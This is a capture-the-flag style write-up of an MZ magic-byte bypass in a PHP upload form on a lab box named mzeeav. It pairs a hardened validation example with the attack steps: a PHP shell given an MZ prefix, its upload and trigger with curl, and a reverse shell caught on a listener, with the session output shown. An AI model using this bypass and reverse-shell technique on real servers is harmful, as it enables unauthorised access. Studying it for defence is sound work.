Arbitrary File Upload


A backup archive of the target web application was discovered, leaking the source code of the file upload functionality. The upload.php file renames the uploaded file to file.tmp and writes it to the upload directory, then validates the file signature by checking for the magic bytes 4D5A, the DOS MZ executable header shared by its descendants (including NE and PE). Only those two leading bytes are inspected; the rest of the content, and the extension the file is ultimately served under, are never checked.
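The following PHP is an added example written for this writeup and is not the mzeeav upload.php. It places the two-byte check described above next to a structural PE check and a hardened acceptance decision (extension allowlist, server-generated file name). The function names and the allowlist are assumptions for the demonstration; the sample inputs are constructed.

```php
<?php
// Added example, not the mzeeav upload.php. Runs stand-alone: `php upload_checks.php`.
// Sample inputs below are constructed for the demonstration.

// Weak check: the logic described for upload.php. Only the first two bytes are compared
// against 4D 5A, so any content that merely begins with "MZ" is accepted.
function weakSignatureCheck(string $content): bool
{
    return substr($content, 0, 2) === "MZ";
}

// Structural check (assumed design, not from the page): follow the MZ header's
// e_lfanew field (little-endian uint32 at offset 0x3C) and require the "PE\0\0"
// signature there, as a PE loader would. A script with "MZ" glued on the front
// has no valid e_lfanew and is rejected here.
function looksLikePortableExecutable(string $content): bool
{
    if (strlen($content) < 0x40 || substr($content, 0, 2) !== "MZ") {
        return false;
    }
    $eLfanew = unpack('V', substr($content, 0x3C, 4))[1];
    if ($eLfanew < 0x40 || $eLfanew + 4 > strlen($content)) {
        return false;
    }
    return substr($content, $eLfanew, 4) === "PE\0\0";
}

// Hardened acceptance decision (assumed design): allowlist the extension, require the
// structural check, and never reuse the client's file name. The last point is the one
// that actually matters for the mzeeav bug: a polyglot can still pass a content check,
// but it is harmless if it is never stored under a name the web server will execute.
function hardenedUploadDecision(string $originalName, string $content): array
{
    $allowedExt = ['exe', 'dll'];
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return ['ok' => false, 'reason' => "extension '$ext' not allowlisted"];
    }
    if (!looksLikePortableExecutable($content)) {
        return ['ok' => false, 'reason' => 'content is not a structurally valid PE'];
    }
    // Server-generated name with a fixed, non-script extension. In deployment the file
    // would also go to a directory outside the web root or one with script execution off.
    $storedAs = bin2hex(random_bytes(16)) . '.' . $ext;
    return ['ok' => true, 'stored_as' => $storedAs];
}

// Constructed samples: a script body with "MZ" prepended, and a minimal MZ/PE header stub.
$mzPrefixedScript = "MZ<?php /* constructed sample script body */ echo 1;";
$peStub = str_pad("MZ", 0x3C, "\0") . pack('V', 0x40) . "PE\0\0" . str_repeat("\0", 64);

printf("weak check, MZ-prefixed script : %s\n", weakSignatureCheck($mzPrefixedScript) ? 'accepted' : 'rejected');
printf("structural, MZ-prefixed script : %s\n", looksLikePortableExecutable($mzPrefixedScript) ? 'accepted' : 'rejected');
printf("structural, PE stub            : %s\n", looksLikePortableExecutable($peStub) ? 'accepted' : 'rejected');
print_r(hardenedUploadDecision('shell.php', $mzPrefixedScript));
print_r(hardenedUploadDecision('tool.exe', $peStub));
```

The weak check accepts the MZ-prefixed script while the structural check rejects it, but the decisive control is the last function: the stored name is chosen by the server and the extension comes from an allowlist, so even content that passes every signature check is never written to the upload directory as something the web server will interpret.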

Just need to prepend MZ to the payload.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mzeeav]
└─$ hexeditor shell.php 

Checking with hexeditor confirms the 4D5A bytes are present, satisfying the requirement in upload.php.

The payload is uploaded successfully and the browser is redirected to the listing.php page.

There it is. It should be accessible in the upload directory.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mzeeav]
└─$ curl -s http://$IP/upload/shell.php

Invoking the payload:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mzeeav]
└─$ nnc 9999      
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.190.33] 53752
SOCKET: Shell has connected! PID: 1174
whoami
www-data
hostname
mzeeav
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:81:fb brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.190.33/24 brd 192.168.190.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the www-data account via arbitrary file upload.